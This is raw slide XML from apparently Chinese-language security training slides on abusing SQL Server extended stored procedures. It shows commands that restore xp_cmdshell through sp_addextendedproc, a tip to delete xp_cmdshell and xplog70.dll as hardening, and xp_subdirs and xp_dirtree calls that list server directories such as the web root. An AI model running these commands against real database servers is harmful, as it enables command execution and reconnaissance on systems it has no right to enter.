              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_addextendedproc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> xp_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>,@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>dllname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> ='xplog70.dll' declare @o int;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_addextendedproc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>', 'xpsql70.dll';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>彻底删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>扩展存储过程，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>盘里直接搜索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xplog70.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>，然后删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13434999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2"/>
            <a:ext cx="11035409" cy="28315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扩展存储过程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开头，主要使用外部程序语言编写的存储过程。</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直接利用其执行命令， </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xp_subdirs</a:t>
            </a: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读取文件夹内的文件夹列表等</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b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xp_subdirs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="645831" y="3470810"/>
            <a:ext cx="4607992" cy="61554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en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_subdirs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>用于得到给定的文件夹内的文件夹列表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_subdirs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> 'c:\';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDA07C33-F5F8-464D-B1A6-C4776BECC248}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7305998" y="2913349"/>
            <a:ext cx="4136749" cy="3704728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3147199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1"/>
            <a:ext cx="11035409" cy="2339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扩展存储过程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开头，主要使用外部程序语言编写的存储过程。</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直接利用其执行命令， </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xp_subdirs</a:t>
            </a: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读取文件夹内的文件夹列表等</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b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xp_dirtree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578295" y="3676458"/>
            <a:ext cx="4607992" cy="2339096"/>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en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_dirtree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>用于显示当前目录的子目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>该存储过程有三个参数：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>- directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>：第一个参数是要查询的目录；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>- depth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>：第二个参数是要显示的子目录的深度，默认值是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>，表示显示所有的子目录；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170" hangingPunct="0">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>：第三个参数是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>类型，指定是否显示子目录中的文件（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>），默认值是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>，表示不显示任何文件，只显示子目录（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>）；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_dirtree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> 'c:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>inetpub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>wwwroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C8B1E26-3A23-4FD9-A91E-F311F35B33CC}"/>
              </a:ext>
            </a:extLst>
